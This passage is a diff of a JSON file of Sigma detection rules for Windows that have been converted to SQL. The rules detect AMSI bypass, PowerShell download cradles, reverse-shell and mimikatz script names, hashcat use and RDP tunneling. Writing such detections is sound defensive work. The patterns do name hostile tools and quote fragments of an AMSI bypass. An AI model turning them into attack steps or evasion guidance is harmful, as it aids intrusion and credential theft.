'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\wusa.exe' ESCAPE '\\' AND CommandLine LIKE '%/extract:%' ESCAPE '\\')" + ], + "filename": "proc_creation_win_wusa_cab_files_extraction.yml" + }, + { + "title": "Suspicious Program Names", + "id": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "status": "test", + "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", + "author": "Florian Roth (Nextron Systems)", + "falsepositives": [ + "Legitimate tools that accidentally match on the searched patterns" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (ImageLoaded LIKE '%\\\\vss\\_ps.dll' ESCAPE '\\' AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\clussvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dismhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\dllhost.exe' ESCAPE '\\' OR NewProcessName LIKE 
'%\\\\inetsrv\\\\appcmd.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\inetsrv\\\\iissetup.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\rundll32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\searchindexer.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\srtasks.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\taskhostw.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\thor64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\tiworker.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\vssvc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\WmiPrvSE.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\System32\\\\SystemPropertiesAdvanced.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (CommandLine LIKE 'C:\\\\$WinREAgent\\\\Scratch\\\\%' ESCAPE '\\' AND CommandLine LIKE '%\\\\dismhost.exe {%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((NewProcessName LIKE '%\\\\CVE-202%' ESCAPE '\\' OR NewProcessName LIKE '%\\\\CVE202%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\poc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact\\_protected.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\artifact32big.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfuscated.exe' ESCAPE '\\' OR NewProcessName LIKE '%obfusc.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\meterpreter' ESCAPE '\\') OR (CommandLine LIKE '%inject.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-CVE%' ESCAPE '\\' OR CommandLine LIKE '%pupy.ps1%' ESCAPE '\\' OR CommandLine LIKE '%payload.ps1%' ESCAPE '\\' OR CommandLine LIKE '%beacon.ps1%' ESCAPE '\\' OR CommandLine LIKE 
'%PowerView.ps1%' ESCAPE '\\' OR CommandLine LIKE '%bypass.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfuscated.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfusc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfus.ps1%' ESCAPE '\\' OR CommandLine LIKE '%obfs.ps1%' ESCAPE '\\' OR CommandLine LIKE '%evil.ps1%' ESCAPE '\\' OR CommandLine LIKE '%MiniDogz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\_enc.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\shell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\rshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%revshell.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\av\\_test.ps1%' ESCAPE '\\' OR CommandLine LIKE '%adrecon.ps1%' ESCAPE '\\' OR CommandLine LIKE '%mimikatz.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\PowerUp\\_%' ESCAPE '\\' OR CommandLine LIKE '%powerup.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\a.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\p.ps1%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Temp\\\\1.ps1%' ESCAPE '\\' OR CommandLine LIKE '%Hound.ps1%' ESCAPE '\\' OR CommandLine LIKE '%encode.ps1%' ESCAPE '\\' OR CommandLine LIKE '%powercat.ps1%' ESCAPE '\\')))" ], - "filename": "image_load_dll_vss_ps_susp_load.yml" + "filename": "proc_creation_win_susp_progname.yml" }, { - "title": "DLL Sideloading Of ShellChromeAPI.DLL", - "id": "ee4c5d06-3abc-48cc-8885-77f1c20f4451", - "status": "experimental", - "description": "Detects processes loading the non-existent DLL \"ShellChromeAPI\". 
One known example is the \"DeviceEnroller\" binary in combination with the \"PhoneDeepLink\" flag tries to load this DLL.\nAdversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter\n", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Renamed ZOHO Dctask64 Execution", + "id": "340a090b-c4e9-412e-bb36-b4b16fe96f9b", + "status": "test", + "description": "Detects a renamed dctask64.exe used for process injection, command execution, process creation with a signed binary by ZOHO Corporation", + "author": "Florian Roth (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.t1036", + "attack.t1055.001", + "attack.t1202", + "attack.t1218" ], "falsepositives": [ - "Unknown" + "Unknown yet" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ImageLoaded LIKE '%\\\\ShellChromeAPI.dll' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND Hashes LIKE '%6834B1B94E49701D77CCB3C0895E1AFD%' ESCAPE '\\' AND NOT (NewProcessName LIKE '%\\\\dctask64.exe' ESCAPE '\\'))" ], - "filename": "image_load_side_load_shell_chrome_api.yml" + "filename": "proc_creation_win_renamed_dctask64.yml" }, { - "title": "Suspicious WSMAN Provider Image Loads", - "id": "ad1f4bb9-8dfb-4765-adb6-2a7cfb6c0f94", + "title": "Fsutil Behavior Set SymlinkEvaluation", + "id": "c0b2768a-dd06-4671-8339-b16ca8d1f27f", "status": "experimental", - "description": "Detects signs of potential use of the WSMAN provider from uncommon processes locally and remote execution.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "A symbolic link is a type of file that contains a reference to another file.\nThis is probably done to make sure that the ransomware is able to follow shortcuts on the machine in order to find the original file to encrypt\n", + "author": "frack113", 
"tags": [ "attack.execution", - "attack.t1059.001", - "attack.lateral_movement", - "attack.t1021.003" + "attack.t1059" ], "falsepositives": [ - "Unknown" + "Legitimate use" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((((ImageLoaded LIKE '%\\\\WsmSvc.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WsmAuto.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Microsoft.WSMan.Management.ni.dll' ESCAPE '\\') OR OriginalFileName IN ('WsmSvc.dll', 'WSMANAUTOMATION.DLL', 'Microsoft.WSMan.Management.dll')) OR (NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND OriginalFileName = 'WsmWmiPl.dll')) AND NOT (((NewProcessName LIKE '%\\\\powershell.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\sdiagnhost.exe' ESCAPE '\\' OR NewProcessName LIKE '%C:\\\\Windows\\\\System32\\\\services.exe' ESCAPE '\\')) OR ((CommandLine LIKE '%svchost.exe -k netsvcs -p -s BITS%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k GraphicsPerfSvcGroup -s GraphicsPerfSvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k NetworkService -p -s Wecsvc%' ESCAPE '\\' OR CommandLine LIKE '%svchost.exe -k netsvcs%' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\Microsoft.NET\\\\Framework\\\\v%' ESCAPE '\\') AND NewProcessName LIKE '%\\\\mscorsvw.exe' ESCAPE '\\') OR ((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\Configure-SMRemoting.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\ServerManager.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Windows\\\\Temp\\\\asgard2-agent\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Citrix\\\\%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\powershell\\_ise.exe' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\$WINDOWS.~BT\\\\Sources\\\\%' ESCAPE '\\'))) AND NOT ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 
'Security') AND (NewProcessName LIKE '%\\\\fsutil.exe' ESCAPE '\\' OR OriginalFileName = 'fsutil.exe') AND (CommandLine LIKE '%behavior %' ESCAPE '\\' AND CommandLine LIKE '%set %' ESCAPE '\\' AND CommandLine LIKE '%SymlinkEvaluation%' ESCAPE '\\'))" ], - "filename": "image_load_wsman_provider_image_load.yml" + "filename": "proc_creation_win_fsutil_symlinkevaluation.yml" }, { - "title": "Potential DLL Sideloading Via comctl32.dll", - "id": "6360757a-d460-456c-8b13-74cf0e60cceb", - "status": "experimental", - "description": "Detects potential DLL sideloading using comctl32.dll to obtain system privileges", - "author": "Nasreddine Bencherchali (Nextron Systems), Subhash Popuri (@pbssubhash)", + "title": "Xwizard DLL Sideloading", + "id": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "status": "test", + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "author": "Christian Burkard (Nextron Systems)", "tags": [ "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", "attack.t1574.002" ], "falsepositives": [ - "Unlikely" + "Windows installed on non-C drive" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\logonUI.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\werFault.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\consent.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Windows\\\\System32\\\\narrator.exe.local\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\windows\\\\system32\\\\wermgr.exe.local\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%\\\\comctl32.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND NewProcessName LIKE '%\\\\xwizard.exe' ESCAPE '\\' AND NOT (NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\'))" ], - "filename": 
"image_load_side_load_comctl32.yml" + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml" }, { - "title": "Svchost DLL Search Order Hijack", - "id": "602a1f13-c640-4d73-b053-be9a2fa58b77", - "status": "test", - "description": "Detects DLL sideloading of DLLs that are loaded by the SCM for some services (IKE, IKEEXT, SessionEnv) which do not exists on a typical modern system\nIKEEXT and SessionEnv service, as they call LoadLibrary on files that do not exist within C:\\Windows\\System32\\ by default.\nAn attacker can place their malicious logic within the PROCESS_ATTACH block of their library and restart the aforementioned services \"svchost.exe -k netsvcs\" to gain code execution on a remote machine.\n", - "author": "SBousseaden", + "title": "Browser Started with Remote Debugging", + "id": "b3d34dc5-2efd-4ae3-845f-8ec14921f449", + "status": "experimental", + "description": "Detects browsers starting with the remote debugging flags. Which is a technique often used to perform browser injection attacks", + "author": "pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.defense_evasion", - "attack.t1574.002", - "attack.t1574.001" + "attack.credential_access", + "attack.t1185" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((NewProcessName LIKE '%\\\\svchost.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\tsmsisrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\tsvipsrv.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wlbsctrl.dll' ESCAPE '\\')) AND NOT (ImageLoaded LIKE 'C:\\\\Windows\\\\WinSxS\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (CommandLine LIKE '% --remote-debugging-%' ESCAPE '\\' OR (NewProcessName LIKE '%\\\\firefox.exe' ESCAPE '\\' AND CommandLine LIKE '% -start-debugger-server%' ESCAPE '\\')))" ], - "filename": "image_load_side_load_svchost_dlls.yml" + "filename": 
"proc_creation_win_browsers_remote_debugging.yml" }, { - "title": "Windows Spooler Service Suspicious Binary Load", - "id": "02fb90de-c321-4e63-a6b9-25f4b03dfd14", - "status": "experimental", - "description": "Detect DLL Load from Spooler Service backup folder", - "author": "FPT.EagleEye, Thomas Patzke (improvements)", + "title": "Potential AMSI Bypass Via .NET Reflection", + "id": "30edb182-aa75-42c0-b0a9-e998bb29067c", + "status": "test", + "description": "Detects Request to \"amsiInitFailed\" that can be used to disable AMSI Scanning", + "author": "Markus Neis, @Kostastsale", "tags": [ - "attack.persistence", "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1574", - "cve.2021.1675", - "cve.2021.34527" + "attack.t1562.001" ], "falsepositives": [ - "Loading of legitimate driver" + "Unlikely" ], - "level": "informational", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\spoolsv.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\4\\\\%' ESCAPE '\\') AND ImageLoaded LIKE '%.dll' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND ((CommandLine LIKE '%System.Management.Automation.AmsiUtils%' ESCAPE '\\' OR CommandLine LIKE '%amsiInitFailed%' ESCAPE '\\') OR (CommandLine LIKE '%[Ref].Assembly.GetType%' ESCAPE '\\' AND CommandLine LIKE '%SetValue($null,$true)%' ESCAPE '\\' AND CommandLine LIKE '%NonPublic,Static%' ESCAPE '\\')))" ], - "filename": "image_load_spoolsv_dll_load.yml" + "filename": "proc_creation_win_powershell_amsi_init_failed_bypass.yml" }, { - "title": "UIPromptForCredentials DLLs", - "id": "9ae01559-cf7e-4f8e-8e14-4c290a1b4784", + "title": "Add New Download Source To Winget", + "id": "05ebafc8-7aa2-4bcd-a269-2aec93f9e842", "status": "experimental", - "description": "Detects potential use of UIPromptForCredentials functions 
by looking for some of the DLLs needed for it.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "description": "Detects usage of winget to add new additional download sources", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.credential_access", - "attack.collection", - "attack.t1056.002" + "attack.defense_evasion", + "attack.execution", + "attack.t1059" ], "falsepositives": [ - "Other legitimate processes loading those DLLs in your environment." + "False positive are expected with legitimate sources" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (((ImageLoaded LIKE '%\\\\credui.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\wincredui.dll' ESCAPE '\\') OR OriginalFileName IN ('credui.dll', 'wincredui.dll')) AND NOT (((NewProcessName LIKE 'C:\\\\Windows\\\\System32\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\SysWOW64\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR ((NewProcessName LIKE '%\\\\opera\\_autoupdate.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp64.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\procexp.exe' ESCAPE '\\')) OR ((NewProcessName LIKE 'C:\\\\Windows\\\\ImmersiveControlPanel\\\\SystemSettings.exe' ESCAPE '\\' OR NewProcessName LIKE 'C:\\\\Windows\\\\explorer.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND (NewProcessName LIKE '%\\\\AppData\\\\Roaming\\\\Spotify\\\\Spotify.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\current\\\\Teams.exe' ESCAPE '\\' OR NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\Teams\\\\stage\\\\Teams.exe' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Users\\\\%' ESCAPE '\\' AND NewProcessName LIKE '%\\\\AppData\\\\Local\\\\Microsoft\\\\OneDrive\\\\%' ESCAPE '\\') OR (NewProcessName LIKE 'C:\\\\Windows\\\\regedit.exe' ESCAPE '\\') OR (Provider_Name = 
'Microsoft-Windows-Kernel-Process' AND CommandLine LIKE '%C:\\\\Program Files\\\\WindowsApps\\\\SpotifyAB.SpotifyMusic\\_%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\winget.exe' ESCAPE '\\' OR OriginalFileName = 'winget.exe') AND (CommandLine LIKE '%source %' ESCAPE '\\' AND CommandLine LIKE '%add %' ESCAPE '\\'))" ], - "filename": "image_load_uipromptforcreds_dlls.yml" + "filename": "proc_creation_win_winget_add_custom_source.yml" }, { - "title": "Potential Antivirus Software DLL Sideloading", - "id": "552b6b65-df37-4d3e-a258-f2fc4771ae54", - "status": "experimental", - "description": "Detects potential DLL sideloading of DLLs that are part of antivirus software suchas McAfee, Symantec...etc", - "author": "Nasreddine Bencherchali (Nextron Systems), Wietze Beukema (project and research)", + "title": "Format.com FileSystem LOLBIN", + "id": "9fb6b26e-7f9e-4517-a48b-8cac4a1b6c60", + "status": "test", + "description": "Detects the execution of format.com with a suspicious filesystem selection that could indicate a defense evasion activity in which format.com is used to load malicious DLL files or other programs", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.persistence", - "attack.privilege_escalation", - "attack.t1574.001", - "attack.t1574.002" + "attack.defense_evasion" ], "falsepositives": [ - "Applications that load the same dlls mentioned in the detection section. 
Investigate them and filter them out if a lot FPs are caused.", - "Dell SARemediation plugin folder (C:\\Program Files\\Dell\\SARemediation\\plugin\\log.dll) is known to contain the 'log.dll' file.", - "The Canon MyPrinter folder 'C:\\Program Files\\Canon\\MyPrinter\\' is known to contain the 'log.dll' file" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (((((((ImageLoaded LIKE '%\\\\log.dll' ESCAPE '\\' AND NOT (((ImageLoaded LIKE 'C:\\\\Program Files\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\Bitdefender Antivirus Free\\\\%' ESCAPE '\\')) OR (NewProcessName LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\TelemetryUtility.exe' ESCAPE '\\' AND (ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\plugin\\\\log.dll' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files\\\\Dell\\\\SARemediation\\\\audit\\\\log.dll' ESCAPE '\\')) OR (ImageLoaded LIKE 'C:\\\\Program Files\\\\Canon\\\\MyPrinter\\\\%' ESCAPE '\\'))) OR (ImageLoaded LIKE '%\\\\qrt.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\F-Secure\\\\Anti-Virus\\\\%' ESCAPE '\\')))) OR ((ImageLoaded LIKE '%\\\\ashldres.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lockdown.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vsodscpl.dll' ESCAPE '\\') AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\McAfee\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\McAfee\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\vftrace.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\Program Files\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\Program Files (x86)\\\\CyberArk\\\\Endpoint Privilege Manager\\\\Agent\\\\x32\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\wsc.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program 
Files\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\AVAST Software\\\\Avast\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\tmdbglog.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\Trend Micro\\\\Titanium\\\\%' ESCAPE '\\')))) OR (ImageLoaded LIKE '%\\\\DLPPREM32.dll' ESCAPE '\\' AND NOT ((ImageLoaded LIKE 'C:\\\\program Files\\\\ESET%' ESCAPE '\\' OR ImageLoaded LIKE 'C:\\\\program Files (x86)\\\\ESET%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\format.com' ESCAPE '\\' AND CommandLine LIKE '%/fs:%' ESCAPE '\\') AND NOT (((CommandLine LIKE '%/fs:FAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:exFAT%' ESCAPE '\\' OR CommandLine LIKE '%/fs:NTFS%' ESCAPE '\\' OR CommandLine LIKE '%/fs:UDF%' ESCAPE '\\' OR CommandLine LIKE '%/fs:ReFS%' ESCAPE '\\'))))" ], - "filename": "image_load_side_load_antivirus.yml" + "filename": "proc_creation_win_lolbin_format.yml" }, { - "title": "HackTool - SharpEvtMute DLL Load", - "id": "49329257-089d-46e6-af37-4afce4290685", - "status": "experimental", - "description": "Detects the load of EvtMuteHook.dll, a key component of SharpEvtHook, a tool that tampers with the Windows event logs", + "title": "Droppers Exploiting CVE-2017-11882", + "id": "678eb5f4-8597-4be6-8be7-905e4234b53a", + "status": "stable", + "description": "Detects exploits that use CVE-2017-11882 to start EQNEDT32.EXE and other sub processes like mshta.exe", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.002" + "attack.execution", + "attack.t1203", + "attack.t1204.002", + "attack.initial_access", + "attack.t1566.001" ], "falsepositives": [ - "Other DLLs with the same Imphash" + "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Hashes LIKE 
'%IMPHASH=330768A4F172E10ACB6287B87289D83B%' ESCAPE '\\' OR Imphash = '330768a4f172e10acb6287b87289d83b')" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND ParentProcessName LIKE '%\\\\EQNEDT32.EXE' ESCAPE '\\')" ], - "filename": "image_load_hktl_sharpevtmute.yml" + "filename": "proc_creation_win_exploit_cve_2017_11882.yml" }, { - "title": "HackTool - SILENTTRINITY Stager DLL Load", - "id": "75c505b1-711d-4f68-a357-8c3fe37dbf2d", + "title": "HackTool - Hashcat Password Cracker Execution", + "id": "39b31e81-5f5f-4898-9c0e-2160cfc0f9bf", "status": "test", - "description": "Detects SILENTTRINITY stager dll loading activity", - "author": "Aleksey Potapov, oscd.community", + "description": "Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against", + "author": "frack113", "tags": [ - "attack.command_and_control", - "attack.t1071" + "attack.credential_access", + "attack.t1110.002" ], "falsepositives": [ - "Unlikely" + "Tools that use similar command line flags and values" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE Description LIKE '%st2stager%' ESCAPE '\\'" + "SELECT * FROM logs WHERE ((EventID = '4688' AND Channel = 'Security') AND (NewProcessName LIKE '%\\\\hashcat.exe' ESCAPE '\\' OR (CommandLine LIKE '%-a %' ESCAPE '\\' AND CommandLine LIKE '%-m 1000 %' ESCAPE '\\' AND CommandLine LIKE '%-r %' ESCAPE '\\')))" ], - "filename": "image_load_hktl_silenttrinity_stager.yml" + "filename": "proc_creation_win_hktl_hashcat.yml" }, { - "title": "Possible Process Hollowing Image Loading", - "id": "e32ce4f5-46c6-4c47-ba69-5de3c9193cd7", - "status": "test", - "description": "Detects Loading of samlib.dll, WinSCard.dll from untypical process e.g. 
through process hollowing by Mimikatz", - "author": "Markus Neis", - "tags": [ - "attack.defense_evasion", - "attack.t1574.002" - ], + "title": "PowerShell Web Download", + "id": "6e897651-f157-4d8f-aaeb-df8151488385", + "status": "experimental", + "description": "Detects suspicious ways to download files or content using PowerShell", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ - "Very likely, needs more tuning" + "Scripts or tools that download files" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\notepad.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\samlib.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinSCard.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND (CommandLine LIKE '%.DownloadString(%' ESCAPE '\\' OR CommandLine LIKE '%.DownloadFile(%' ESCAPE '\\' OR CommandLine LIKE '%Invoke-WebRequest %' ESCAPE '\\' OR CommandLine LIKE '%iwr %' ESCAPE '\\'))" ], - "filename": "image_load_susp_uncommon_image_load.yml" + "filename": "proc_creation_win_powershell_download_cradles.yml" }, { - "title": "WMIC Loading Scripting Libraries", - "id": "06ce37c2-61ab-4f05-9ff5-b1a96d18ae32", - "status": "test", - "description": "Detects threat actors proxy executing code and bypassing application controls by leveraging wmic and the `/FORMAT` argument switch to download and execute an XSL file (i.e js, vbs, etc).", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Potential RDP Tunneling Via SSH", + "id": "f7d7ebd5-a016-46e2-9c54-f9932f2d386d", + "status": "experimental", + "description": "Execution of ssh.exe to perform data exfiltration and tunneling through RDP", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1220" + "attack.command_and_control", + "attack.t1572" ], "falsepositives": [ - "The command wmic os get lastboottuptime loads vbscript.dll", - "The 
command wmic os get locale loads vbscript.dll", - "Since the ImageLoad event doesn't have enough information in this case. It's better to look at the recent process creation events that spawned the WMIC process and investigate the command line and parent/child processes to get more insights" + "Administrative activity" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (NewProcessName LIKE '%\\\\wmic.exe' ESCAPE '\\' AND (ImageLoaded LIKE '%\\\\jscript.dll' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\vbscript.dll' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4688' AND Channel = 'Security' AND NewProcessName LIKE '%\\\\ssh.exe' ESCAPE '\\' AND CommandLine LIKE '%:3389%' ESCAPE '\\')" ], - "filename": "image_load_wmic_remote_xsl_scripting_dlls.yml" + "filename": "proc_creation_win_ssh_rdp_tunneling.yml" }, { - "title": "Suspicious UltraVNC Execution", - "id": "871b9555-69ca-4993-99d3-35a59f9f3599", - "status": "test", - "description": "Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)", - "author": "Bhabesh Raj", + "title": "Bad Opsec Defaults Sacrificial Processes With Improper Arguments", + "id": "a7c3d773-caef-227e-a7e7-c2f13c622329", + "status": "experimental", + "description": "Detects attackers using tooling with bad opsec defaults.\nE.g. 
